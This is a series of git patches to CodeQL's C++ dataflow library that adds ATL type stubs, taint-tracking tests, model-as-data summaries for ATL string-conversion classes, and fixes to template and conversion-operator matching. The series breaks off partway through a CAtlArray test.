use=moduleImport("types").getMember("AssignmentAnnotation").getAnnotatedInstance() From fe9feb900d8351b380c716c837b7500d9477e808 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Tue, 26 Nov 2024 17:29:26 +0000 Subject: [PATCH 0715/1267] C++: We will need all these types. --- .../dataflow/taint-tests/atl.cpp | 65 +++++++++++++++++++ 1 file changed, 65 insertions(+) create mode 100644 cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp new file mode 100644 index 00000000000..58a00385c33 --- /dev/null +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp @@ -0,0 +1,65 @@ +namespace { + template T source(); + template T* indirect_source(); + void sink(...); +} + +typedef unsigned int UINT; +typedef long LONG; +typedef void* LPVOID; +typedef void* PVOID; +typedef bool BOOL; +typedef char* PSTR, *LPSTR; +typedef const char* LPCTSTR; +typedef unsigned short WORD; +typedef unsigned long DWORD; +typedef void* HANDLE; +typedef LONG HRESULT; +typedef unsigned long ULONG; +typedef const char* LPCSTR; +typedef wchar_t OLECHAR; +typedef OLECHAR* LPOLESTR; +typedef const LPOLESTR LPCOLESTR; +typedef OLECHAR* BSTR; +typedef wchar_t* LPWSTR, *PWSTR; +typedef BSTR* LPBSTR; +typedef unsigned short USHORT; +typedef char *LPTSTR; +struct __POSITION { int unused; };typedef __POSITION* POSITION; +typedef WORD ATL_URL_PORT; + +enum ATL_URL_SCHEME{ + ATL_URL_SCHEME_UNKNOWN = -1, + ATL_URL_SCHEME_FTP = 0, + ATL_URL_SCHEME_GOPHER = 1, + ATL_URL_SCHEME_HTTP = 2, + ATL_URL_SCHEME_HTTPS = 3, + ATL_URL_SCHEME_FILE = 4, + ATL_URL_SCHEME_NEWS = 5, + ATL_URL_SCHEME_MAILTO = 6, + ATL_URL_SCHEME_SOCKS = 7 +}; + +using HINSTANCE = void*; +using size_t = decltype(sizeof(int)); +using SIZE_T = size_t; + +#define NULL nullptr + +typedef struct tagSAFEARRAYBOUND { + ULONG cElements; + LONG lLbound; +} SAFEARRAYBOUND, *LPSAFEARRAYBOUND; + +typedef struct tagVARIANT { + /* ... */ +} VARIANT; + +typedef struct tagSAFEARRAY { + USHORT cDims; + USHORT fFeatures; + ULONG cbElements; + ULONG cLocks; + PVOID pvData; + SAFEARRAYBOUND rgsabound[1]; +} SAFEARRAY, *LPSAFEARRAY; From 16e5fa34d17ae874926ac8aa8c6b8d983e547aa1 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Tue, 26 Nov 2024 17:30:31 +0000 Subject: [PATCH 0716/1267] C++: Add failing tests with U_STRINGorID. --- .../dataflow/external-models/flow.expected | 10 ++++----- .../external-models/validatemodels.expected | 21 +++++++++++++++++++ .../dataflow/taint-tests/atl.cpp | 21 +++++++++++++++++++ .../dataflow/taint-tests/localTaint.expected | 7 +++++++ 4 files changed, 54 insertions(+), 5 deletions(-) diff --git a/cpp/ql/test/library-tests/dataflow/external-models/flow.expected b/cpp/ql/test/library-tests/dataflow/external-models/flow.expected index a3d09178f2c..d1e895f2eaf 100644 --- a/cpp/ql/test/library-tests/dataflow/external-models/flow.expected +++ b/cpp/ql/test/library-tests/dataflow/external-models/flow.expected @@ -11,14 +11,14 @@ edges | asio_streams.cpp:100:44:100:62 | call to buffer | asio_streams.cpp:103:29:103:39 | *send_buffer | provenance | Sink:MaD:6 | | asio_streams.cpp:100:64:100:71 | *send_str | asio_streams.cpp:56:18:56:23 | [summary param] *0 in buffer | provenance | | | asio_streams.cpp:100:64:100:71 | *send_str | asio_streams.cpp:100:44:100:62 | call to buffer | provenance | MaD:10 | -| test.cpp:4:5:4:11 | [summary param] 0 in ymlStep | test.cpp:4:5:4:11 | [summary] to write: ReturnValue in ymlStep | provenance | MaD:644 | -| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:7:10:7:18 | call to ymlSource | provenance | Src:MaD:642 | -| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:11:10:11:10 | x | provenance | Sink:MaD:643 | +| test.cpp:4:5:4:11 | [summary param] 0 in ymlStep | test.cpp:4:5:4:11 | [summary] to write: ReturnValue in ymlStep | provenance | MaD:819 | +| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:7:10:7:18 | call to ymlSource | provenance | Src:MaD:817 | +| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:11:10:11:10 | x | provenance | Sink:MaD:818 | | test.cpp:7:10:7:18 | call to ymlSource | test.cpp:13:18:13:18 | x | provenance | | | test.cpp:13:10:13:16 | call to ymlStep | test.cpp:13:10:13:16 | call to ymlStep | provenance | | -| test.cpp:13:10:13:16 | call to ymlStep | test.cpp:15:10:15:10 | y | provenance | Sink:MaD:643 | +| test.cpp:13:10:13:16 | call to ymlStep | test.cpp:15:10:15:10 | y | provenance | Sink:MaD:818 | | test.cpp:13:18:13:18 | x | test.cpp:4:5:4:11 | [summary param] 0 in ymlStep | provenance | | -| test.cpp:13:18:13:18 | x | test.cpp:13:10:13:16 | call to ymlStep | provenance | MaD:644 | +| test.cpp:13:18:13:18 | x | test.cpp:13:10:13:16 | call to ymlStep | provenance | MaD:819 | nodes | asio_streams.cpp:56:18:56:23 | [summary param] *0 in buffer | semmle.label | [summary param] *0 in buffer | | asio_streams.cpp:56:18:56:23 | [summary] to write: ReturnValue in buffer | semmle.label | [summary] to write: ReturnValue in buffer | diff --git a/cpp/ql/test/library-tests/dataflow/external-models/validatemodels.expected b/cpp/ql/test/library-tests/dataflow/external-models/validatemodels.expected index 2e0a493585c..b0276013106 100644 --- a/cpp/ql/test/library-tests/dataflow/external-models/validatemodels.expected +++ b/cpp/ql/test/library-tests/dataflow/external-models/validatemodels.expected @@ -1,8 +1,27 @@ +| Dubious member name "operator +=" in summary model. | +| Dubious member name "operator BSTR" in summary model. | +| Dubious member name "operator LPCSTR" in summary model. | +| Dubious member name "operator LPSAFEARRAY" in summary model. | +| Dubious member name "operator LPSTR" in summary model. | +| Dubious member name "operator LPWSTR" in summary model. | +| Dubious member name "operator PCXSTR" in summary model. | +| Dubious member name "operator StringType&" in summary model. | +| Dubious member name "operator T*" in summary model. | +| Dubious member name "operator const StringType&" in summary model. | +| Dubious member name "operator&" in summary model. | | Dubious member name "operator*" in summary model. | +| Dubious member name "operator+=" in summary model. | | Dubious member name "operator->" in summary model. | | Dubious member name "operator=" in summary model. | | Dubious member name "operator[]" in summary model. | +| Dubious signature "(CRegKey&)" in summary model. | +| Dubious signature "(DWORD&,LPCTSTR)" in summary model. | | Dubious signature "(InputIterator,InputIterator,const Allocator &)" in summary model. | +| Dubious signature "(const CComBSTR&)" in summary model. | +| Dubious signature "(const CComSafeArray&)" in summary model. | +| Dubious signature "(const SAFEARRAY&)" in summary model. | +| Dubious signature "(const SAFEARRAY*)" in summary model. | +| Dubious signature "(const SAFEARRAYBOUND*, UINT)" in summary model. | | Dubious signature "(const deque &)" in summary model. | | Dubious signature "(const deque &,const Allocator &)" in summary model. | | Dubious signature "(const forward_list &)" in summary model. | @@ -25,3 +44,5 @@ | Dubious signature "(size_type,const T &,const Allocator &)" in summary model. | | Dubious signature "(vector &&)" in summary model. | | Dubious signature "(vector &&,const Allocator &)" in summary model. | +| Dubious signature "operator HKEY" in summary model. | +| Dubious signature "operator=" in summary model. | diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp index 58a00385c33..54e8c65f4c7 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp @@ -63,3 +63,24 @@ typedef struct tagSAFEARRAY { PVOID pvData; SAFEARRAYBOUND rgsabound[1]; } SAFEARRAY, *LPSAFEARRAY; + +struct _U_STRINGorID { + _U_STRINGorID(UINT nID); + _U_STRINGorID(LPCTSTR lpString); + + LPCTSTR m_lpstr; +}; + +void test__U_STRINGorID() { + { + UINT x = source(); + _U_STRINGorID u(x); + sink(u.m_lpstr); // $ MISSING: ir + } + + { + LPCTSTR y = indirect_source(); + _U_STRINGorID u(y); + sink(u.m_lpstr); // $ MISSING: ir + } +} diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected b/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected index b5ddf84747a..7809703f9c8 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected @@ -140,6 +140,13 @@ WARNING: module 'TaintTracking' has been deprecated and may be removed in future | arrayassignment.cpp:145:12:145:12 | 5 | arrayassignment.cpp:145:7:145:13 | access to array | TAINT | | arrayassignment.cpp:146:7:146:10 | arr3 | arrayassignment.cpp:146:7:146:13 | access to array | | | arrayassignment.cpp:146:12:146:12 | 5 | arrayassignment.cpp:146:7:146:13 | access to array | TAINT | +| atl.cpp:32:30:32:30 | 1 | atl.cpp:32:29:32:30 | - ... | TAINT | +| atl.cpp:76:14:76:25 | call to source | atl.cpp:77:21:77:21 | x | | +| atl.cpp:77:21:77:21 | x | atl.cpp:77:21:77:22 | call to _U_STRINGorID | TAINT | +| atl.cpp:77:21:77:22 | call to _U_STRINGorID | atl.cpp:78:10:78:10 | u | | +| atl.cpp:82:17:82:43 | call to indirect_source | atl.cpp:83:21:83:21 | y | | +| atl.cpp:83:21:83:21 | y | atl.cpp:83:21:83:22 | call to _U_STRINGorID | TAINT | +| atl.cpp:83:21:83:22 | call to _U_STRINGorID | atl.cpp:84:10:84:10 | u | | | bsd.cpp:17:11:17:16 | call to source | bsd.cpp:20:18:20:18 | s | | | bsd.cpp:18:12:18:15 | addr | bsd.cpp:20:22:20:25 | addr | | | bsd.cpp:18:12:18:15 | addr | bsd.cpp:23:8:23:11 | addr | | From bf36f00bb0d2c6f75b698628611314abee7c4c39 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Tue, 26 Nov 2024 17:50:30 +0000 Subject: [PATCH 0717/1267] C++: Add model. Observe that flow still fails. --- cpp/ql/lib/ext/CA2CAEX.model.yml | 7 +++++++ 1 file changed, 7 insertions(+) create mode 100644 cpp/ql/lib/ext/CA2CAEX.model.yml diff --git a/cpp/ql/lib/ext/CA2CAEX.model.yml b/cpp/ql/lib/ext/CA2CAEX.model.yml new file mode 100644 index 00000000000..f199d1fddea --- /dev/null +++ b/cpp/ql/lib/ext/CA2CAEX.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/cpp-all + extensible: summaryModel + data: # namespace, type, subtypes, name, signature, ext, input, output, kind, provenance + - ["", "_U_STRINGorID", True, "_U_STRINGorID", "(UINT)", "", "Argument[0]", "Argument[-1].Field[*m_lpstr]", "value", "manual"] + - ["", "_U_STRINGorID", True, "_U_STRINGorID", "(LPCTSTR)", "", "Argument[*0]", "Argument[-1].Field[*m_lpstr]", "value", "manual"] From f688470324a5e4e5432c260fee776831e16cf886 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Tue, 26 Nov 2024 17:53:24 +0000 Subject: [PATCH 0718/1267] C++: Since isConstructedFrom only holds for templates we need to explicitly handle the case where the function (or class) is not a template. --- .../semmle/code/cpp/dataflow/ExternalFlow.qll | 20 +++++++++++++++---- .../dataflow/taint-tests/atl.cpp | 4 ++-- 2 files changed, 18 insertions(+), 6 deletions(-) diff --git a/cpp/ql/lib/semmle/code/cpp/dataflow/ExternalFlow.qll b/cpp/ql/lib/semmle/code/cpp/dataflow/ExternalFlow.qll index 49610b7c85b..ec25b08856c 100644 --- a/cpp/ql/lib/semmle/code/cpp/dataflow/ExternalFlow.qll +++ b/cpp/ql/lib/semmle/code/cpp/dataflow/ExternalFlow.qll @@ -434,18 +434,30 @@ private predicate elementSpec( summaryModel(namespace, type, subtypes, name, signature, ext, _, _, _, _, _) } +private predicate isClassConstructedFrom(Class c, Class templateClass) { + c.isConstructedFrom(templateClass) + or + not any(Class c_).isConstructedFrom(templateClass) and c = templateClass +} + +private predicate isFunctionConstructedFrom(Function f, Function templateFunc) { + f.isConstructedFrom(templateFunc) + or + not any(Function f_).isConstructedFrom(templateFunc) and f = templateFunc +} + /** Gets the fully templated version of `f`. */ private Function getFullyTemplatedFunction(Function f) { not f.isFromUninstantiatedTemplate(_) and ( exists(Class c, Class templateClass, int i | - c.isConstructedFrom(templateClass) and + isClassConstructedFrom(c, templateClass) and f = c.getAMember(i) and result = templateClass.getCanonicalMember(i) ) or not exists(f.getDeclaringType()) and - f.isConstructedFrom(result) + isFunctionConstructedFrom(f, result) ) } @@ -489,7 +501,7 @@ private string getTypeNameWithoutFunctionTemplates(Function f, int n, int remain private string getTypeNameWithoutClassTemplates(Function f, int n, int remaining) { // If there is a declaring type then we start by expanding the function templates exists(Class template | - f.getDeclaringType().isConstructedFrom(template) and + isClassConstructedFrom(f.getDeclaringType(), template) and remaining = template.getNumberOfTemplateArguments() and result = getTypeNameWithoutFunctionTemplates(f, n, 0) ) @@ -501,7 +513,7 @@ private string getTypeNameWithoutClassTemplates(Function f, int n, int remaining or exists(string mid, TemplateParameter tp, Class template | mid = getTypeNameWithoutClassTemplates(f, n, remaining + 1) and - f.getDeclaringType().isConstructedFrom(template) and + isClassConstructedFrom(f.getDeclaringType(), template) and tp = template.getTemplateArgument(remaining) and result = mid.replaceAll(tp.getName(), "class:" + remaining.toString()) ) diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp index 54e8c65f4c7..c0507d3032d 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp @@ -75,12 +75,12 @@ void test__U_STRINGorID() { { UINT x = source(); _U_STRINGorID u(x); - sink(u.m_lpstr); // $ MISSING: ir + sink(u.m_lpstr); // $ ir } { LPCTSTR y = indirect_source(); _U_STRINGorID u(y); - sink(u.m_lpstr); // $ MISSING: ir + sink(u.m_lpstr); // $ ir } } From 749602c98216cc08223d55a9f00443517279af9a Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Tue, 26 Nov 2024 17:54:54 +0000 Subject: [PATCH 0719/1267] C++: Add failing tests with CA2AEX and friends. --- .../dataflow/taint-tests/atl.cpp | 82 +++++++++++++++++++ 1 file changed, 82 insertions(+) diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp index c0507d3032d..d05a2f22a01 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp @@ -84,3 +84,85 @@ void test__U_STRINGorID() { sink(u.m_lpstr); // $ ir } } + +template +struct CA2AEX { + LPSTR m_psz; + char m_szBuffer[t_nBufferLength]; + + CA2AEX(LPCSTR psz, UINT nCodePage); + CA2AEX(LPCSTR psz); + + ~CA2AEX(); + + operator LPSTR() const throw(); +}; + +void test_CA2AEX() { + { + LPSTR x = indirect_source(); + CA2AEX<128> a(x); + sink(static_cast(a)); // $ MISSING: ir + sink(a.m_psz); // $ MISSING: ir + sink(a.m_szBuffer); // $ MISSING: ir + } + + { + LPSTR x = indirect_source(); + CA2AEX<128> a(x, 0); + sink(static_cast(a)); // $ MISSING: ir + sink(a.m_psz); // $ MISSING: ir + sink(a.m_szBuffer); // $ MISSING: ir + } +} + +template +struct CA2CAEX { + CA2CAEX(LPCSTR psz, UINT nCodePage) ; + CA2CAEX(LPCSTR psz) ; + ~CA2CAEX() throw(); + operator LPCSTR() const throw(); + LPCSTR m_psz; +}; + +void test_CA2CAEX() { + LPCSTR x = indirect_source(); + { + CA2CAEX<128> a(x); + sink(static_cast(a)); // $ MISSING: ir + sink(a.m_psz); // $ MISSING: ir + sink(a.m_psz); // $ MISSING: ir + } + { + CA2CAEX<128> a(x, 0); + sink(static_cast(a)); // $ MISSING: ir + sink(a.m_psz); // $ MISSING: ir + sink(a.m_psz); // $ MISSING: ir + } +} + +template +struct CA2WEX { + CA2WEX(LPCSTR psz, UINT nCodePage) ; + CA2WEX(LPCSTR psz) ; + ~CA2WEX() throw(); + operator LPWSTR() const throw(); + LPWSTR m_psz; + wchar_t m_szBuffer[t_nBufferLength]; +}; + +void test_CA2WEX() { + LPCSTR x = indirect_source(); + { + CA2WEX<128> a(x); + sink(static_cast(a)); // $ MISSING: ir + sink(a.m_psz); // $ MISSING: ir + sink(a.m_psz); // $ MISSING: ir + } + { + CA2WEX<128> a(x, 0); + sink(static_cast(a)); // $ MISSING: ir + sink(a.m_psz); // $ MISSING: ir + sink(a.m_psz); // $ MISSING: ir + } +} From 763b991408c56341c4643dd117c0c7682dd2abd6 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Tue, 26 Nov 2024 17:56:32 +0000 Subject: [PATCH 0720/1267] C++: Add models. --- cpp/ql/lib/ext/CA2CAEX.model.yml | 11 +++++++++++ cpp/ql/lib/semmle/code/cpp/models/Models.qll | 1 + .../code/cpp/models/implementations/CA2AEX.qll | 17 +++++++++++++++++ 3 files changed, 29 insertions(+) create mode 100644 cpp/ql/lib/semmle/code/cpp/models/implementations/CA2AEX.qll diff --git a/cpp/ql/lib/ext/CA2CAEX.model.yml b/cpp/ql/lib/ext/CA2CAEX.model.yml index f199d1fddea..ee1d53a537c 100644 --- a/cpp/ql/lib/ext/CA2CAEX.model.yml +++ b/cpp/ql/lib/ext/CA2CAEX.model.yml @@ -5,3 +5,14 @@ extensions: data: # namespace, type, subtypes, name, signature, ext, input, output, kind, provenance - ["", "_U_STRINGorID", True, "_U_STRINGorID", "(UINT)", "", "Argument[0]", "Argument[-1].Field[*m_lpstr]", "value", "manual"] - ["", "_U_STRINGorID", True, "_U_STRINGorID", "(LPCTSTR)", "", "Argument[*0]", "Argument[-1].Field[*m_lpstr]", "value", "manual"] + - ["", "CA2AEX", True, "CA2AEX", "", "", "Argument[*0]", "Argument[-1].Field[*m_psz]", "value", "manual"] + - ["", "CA2AEX", True, "CA2AEX", "", "", "Argument[*0]", "Argument[-1].Field[m_szBuffer]", "value", "manual"] + - ["", "CA2AEX", True, "operator LPSTR", "", "", "Argument[-1].Field[*m_psz]", "ReturnValue[*]", "value", "manual"] + - ["", "CA2AEX", True, "CA2AEX", "", "", "Argument[*0]", "Argument[-1].Field[m_szBuffer]", "value", "manual"] + - ["", "CA2AEX", True, "operator LPSTR", "", "", "Argument[-1].Field[m_szBuffer]", "ReturnValue[*]", "value", "manual"] + - ["", "CA2CAEX", True, "CA2CAEX", "", "", "Argument[*0]", "Argument[-1].Field[*m_psz]", "value", "manual"] + - ["", "CA2CAEX", True, "operator LPCSTR", "", "", "Argument[-1].Field[*m_psz]", "ReturnValue[*]", "value", "manual"] + - ["", "CA2WEX", True, "CA2WEX", "", "", "Argument[*0]", "Argument[-1].Field[*m_psz]", "value", "manual"] + - ["", "CA2WEX", True, "operator LPWSTR", "", "", "Argument[-1].Field[*m_psz]", "ReturnValue[*]", "value", "manual"] + - ["", "CA2WEX", True, "CA2WEX", "", "", "Argument[*0]", "Argument[-1].Field[m_szBuffer]", "value", "manual"] + - ["", "CA2WEX", True, "operator LPWSTR", "", "", "Argument[-1].Field[m_szBuffer]", "ReturnValue[*]", "value", "manual"] \ No newline at end of file diff --git a/cpp/ql/lib/semmle/code/cpp/models/Models.qll b/cpp/ql/lib/semmle/code/cpp/models/Models.qll index f6776a623ff..bb63416eaef 100644 --- a/cpp/ql/lib/semmle/code/cpp/models/Models.qll +++ b/cpp/ql/lib/semmle/code/cpp/models/Models.qll @@ -50,3 +50,4 @@ private import implementations.System private import implementations.StructuredExceptionHandling private import implementations.ZMQ private import implementations.Win32CommandExecution +private import implementations.CA2AEX diff --git a/cpp/ql/lib/semmle/code/cpp/models/implementations/CA2AEX.qll b/cpp/ql/lib/semmle/code/cpp/models/implementations/CA2AEX.qll new file mode 100644 index 00000000000..595b6e3bb3e --- /dev/null +++ b/cpp/ql/lib/semmle/code/cpp/models/implementations/CA2AEX.qll @@ -0,0 +1,17 @@ +private import cpp +private import semmle.code.cpp.ir.dataflow.FlowSteps +private import semmle.code.cpp.dataflow.new.DataFlow + +/** + * The `CA2AEX` (and related) classes from the Windows Active Template library. + */ +class Ca2Aex extends Class { + Ca2Aex() { this.hasGlobalName(["CA2AEX", "CA2CAEX", "CA2WEX"]) } +} + +private class Ca2AexTaintInheritingContent extends TaintInheritingContent, DataFlow::FieldContent { + Ca2AexTaintInheritingContent() { + // The two members m_psz and m_szBuffer + this.getField().getDeclaringType() instanceof Ca2Aex + } +} From 2c7d0dec7d4384a47a49448e1387c7bdd0e9abf0 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Tue, 26 Nov 2024 18:01:33 +0000 Subject: [PATCH 0721/1267] C++: Accept test changes. --- .../dataflow/taint-tests/atl.cpp | 24 +++++++++---------- 1 file changed, 12 insertions(+), 12 deletions(-) diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp index d05a2f22a01..5f0f12b31f8 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp @@ -103,16 +103,16 @@ void test_CA2AEX() { LPSTR x = indirect_source(); CA2AEX<128> a(x); sink(static_cast(a)); // $ MISSING: ir - sink(a.m_psz); // $ MISSING: ir - sink(a.m_szBuffer); // $ MISSING: ir + sink(a.m_psz); // $ ir + sink(a.m_szBuffer); // $ ir } { LPSTR x = indirect_source(); CA2AEX<128> a(x, 0); sink(static_cast(a)); // $ MISSING: ir - sink(a.m_psz); // $ MISSING: ir - sink(a.m_szBuffer); // $ MISSING: ir + sink(a.m_psz); // $ ir + sink(a.m_szBuffer); // $ ir } } @@ -130,14 +130,14 @@ void test_CA2CAEX() { { CA2CAEX<128> a(x); sink(static_cast(a)); // $ MISSING: ir - sink(a.m_psz); // $ MISSING: ir - sink(a.m_psz); // $ MISSING: ir + sink(a.m_psz); // $ ir + sink(a.m_psz); // $ ir } { CA2CAEX<128> a(x, 0); sink(static_cast(a)); // $ MISSING: ir - sink(a.m_psz); // $ MISSING: ir - sink(a.m_psz); // $ MISSING: ir + sink(a.m_psz); // $ ir + sink(a.m_psz); // $ ir } } @@ -156,13 +156,13 @@ void test_CA2WEX() { { CA2WEX<128> a(x); sink(static_cast(a)); // $ MISSING: ir - sink(a.m_psz); // $ MISSING: ir - sink(a.m_psz); // $ MISSING: ir + sink(a.m_psz); // $ ir + sink(a.m_psz); // $ ir } { CA2WEX<128> a(x, 0); sink(static_cast(a)); // $ MISSING: ir - sink(a.m_psz); // $ MISSING: ir - sink(a.m_psz); // $ MISSING: ir + sink(a.m_psz); // $ ir + sink(a.m_psz); // $ ir } } From c00f84d74a0f209b4e25c2d080e0758845914940 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Tue, 26 Nov 2024 18:03:30 +0000 Subject: [PATCH 0722/1267] C++: Work around the 'wrong' function name for conversion operators. --- .../semmle/code/cpp/dataflow/ExternalFlow.qll | 18 +++++++++++++++++- 1 file changed, 17 insertions(+), 1 deletion(-) diff --git a/cpp/ql/lib/semmle/code/cpp/dataflow/ExternalFlow.qll b/cpp/ql/lib/semmle/code/cpp/dataflow/ExternalFlow.qll index ec25b08856c..ac10651b551 100644 --- a/cpp/ql/lib/semmle/code/cpp/dataflow/ExternalFlow.qll +++ b/cpp/ql/lib/semmle/code/cpp/dataflow/ExternalFlow.qll @@ -754,6 +754,22 @@ private predicate elementSpecMatchesSignature( signatureMatches(func, signature, type, name, 0) } +/** + * Holds when `method` has name `nameWithoutArgs`, and gets the enclosing + * class of `method`. Unlike `method.getClassAndName` this predicate does + * not strip typedefs from the name when `method` is an `ConversionOperator`. + */ +bindingset[nameWithoutArgs] +pragma[inline_late] +private Class getClassAndNameImpl(Function method, string nameWithoutArgs) { + exists(string memberName | result = method.getClassAndName(memberName) | + nameWithoutArgs = "operator " + method.(ConversionOperator).getDestType() + or + not method instanceof ConversionOperator and + memberName = nameWithoutArgs + ) +} + /** * Holds if `classWithMethod` has `method` named `name` (excluding any * template parameters). @@ -763,7 +779,7 @@ pragma[inline_late] private predicate hasClassAndName(Class classWithMethod, Function method, string name) { exists(string nameWithoutArgs | parseAngles(name, nameWithoutArgs, _, "") and - classWithMethod = method.getClassAndName(nameWithoutArgs) + classWithMethod = getClassAndNameImpl(method, nameWithoutArgs) ) } From 4f2cd81f9e7956999ba2407adad3c9ef9fd64ce3 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Tue, 26 Nov 2024 18:04:59 +0000 Subject: [PATCH 0723/1267] C++: Accept test changes. --- .../test/library-tests/dataflow/taint-tests/atl.cpp | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp index 5f0f12b31f8..7396d4fce9a 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp @@ -102,7 +102,7 @@ void test_CA2AEX() { { LPSTR x = indirect_source(); CA2AEX<128> a(x); - sink(static_cast(a)); // $ MISSING: ir + sink(static_cast(a)); // $ ir sink(a.m_psz); // $ ir sink(a.m_szBuffer); // $ ir } @@ -110,7 +110,7 @@ void test_CA2AEX() { { LPSTR x = indirect_source(); CA2AEX<128> a(x, 0); - sink(static_cast(a)); // $ MISSING: ir + sink(static_cast(a)); // $ ir sink(a.m_psz); // $ ir sink(a.m_szBuffer); // $ ir } @@ -129,13 +129,13 @@ void test_CA2CAEX() { LPCSTR x = indirect_source(); { CA2CAEX<128> a(x); - sink(static_cast(a)); // $ MISSING: ir + sink(static_cast(a)); // $ ir sink(a.m_psz); // $ ir sink(a.m_psz); // $ ir } { CA2CAEX<128> a(x, 0); - sink(static_cast(a)); // $ MISSING: ir + sink(static_cast(a)); // $ ir sink(a.m_psz); // $ ir sink(a.m_psz); // $ ir } @@ -155,13 +155,13 @@ void test_CA2WEX() { LPCSTR x = indirect_source(); { CA2WEX<128> a(x); - sink(static_cast(a)); // $ MISSING: ir + sink(static_cast(a)); // $ ir sink(a.m_psz); // $ ir sink(a.m_psz); // $ ir } { CA2WEX<128> a(x, 0); - sink(static_cast(a)); // $ MISSING: ir + sink(static_cast(a)); // $ ir sink(a.m_psz); // $ ir sink(a.m_psz); // $ ir } From 1cd426e9f96af085c4e33e66a1dbe49eb33c6fae Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Wed, 27 Nov 2024 11:31:53 +0000 Subject: [PATCH 0724/1267] C++: Add failing tests with 'CAtlArray'. --- .../dataflow/taint-tests/atl.cpp | 83 ++++++++++ .../dataflow/taint-tests/localTaint.expected | 145 ++++++++++++++++++ 2 files changed, 228 insertions(+) diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp index 7396d4fce9a..c26966c908e 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp @@ -166,3 +166,86 @@ void test_CA2WEX() { sink(a.m_psz); // $ ir } } + +template +struct CElementTraitsBase { + typedef const T& INARGTYPE; + typedef T& OUTARGTYPE; + + static void CopyElements(T* pDest, const T* pSrc, size_t nElements); + static void RelocateElements(T* pDest, T* pSrc, size_t nElements); +}; + +template +struct CDefaultElementTraits : public CElementTraitsBase {}; + +template +struct CElementTraits : public CDefaultElementTraits {}; + +template> +struct CAtlArray { + using INARGTYPE = typename ETraits::INARGTYPE; + using OUTARGTYPE = typename ETraits::OUTARGTYPE; + + CAtlArray() throw(); + ~CAtlArray() throw(); + + size_t Add(INARGTYPE element); + size_t Add(); + size_t Append(const CAtlArray& aSrc); + void Copy(const CAtlArray& aSrc); + const E& GetAt(size_t iElement) const throw(); + E& GetAt(size_t iElement) throw(); + size_t GetCount() const throw(); + E* GetData() throw(); + const E* GetData() const throw(); + void InsertArrayAt(size_t iStart, const CAtlArray* paNew); + void InsertAt(size_t iElement, INARGTYPE element, size_t nCount); + bool IsEmpty() const throw(); + void RemoveAll() throw(); + void RemoveAt(size_t iElement, size_t nCount); + void SetAt(size_t iElement, INARGTYPE element); + void SetAtGrow(size_t iElement, INARGTYPE element); + bool SetCount(size_t nNewSize, int nGrowBy); + E& operator[](size_t ielement) throw(); + const E& operator[](size_t ielement) const throw(); +}; + +void test_CAtlArray() { + int x = source(); + + { + CAtlArray a; + a.Add(x); + sink(a[0]); // $ MISSING: ir + a.Add(0); + sink(a[0]); // $ MISSING: ir + + CAtlArray a2; + sink(a2[0]); + a2.Append(a); + sink(a2[0]); // $ MISSING: ir + + CAtlArray a3; + sink(a3[0]); + a3.Copy(a2); + sink(a3[0]); // $ MISSING: ir + + sink(a3.GetAt(0)); // $ MISSING: ir + sink(*a3.GetData()); // $ MISSING: ir + + CAtlArray a4; + sink(a4.GetAt(0)); + a4.InsertArrayAt(0, &a3); + sink(a4.GetAt(0)); // $ MISSING: ir + } + { + CAtlArray a5; + a5.InsertAt(0, source(), 1); + sink(a5[0]); // $ MISSING: ir + + CAtlArray a6; + a6.SetAtGrow(0, source()); + sink(a6[0]); // $ MISSING: ir + 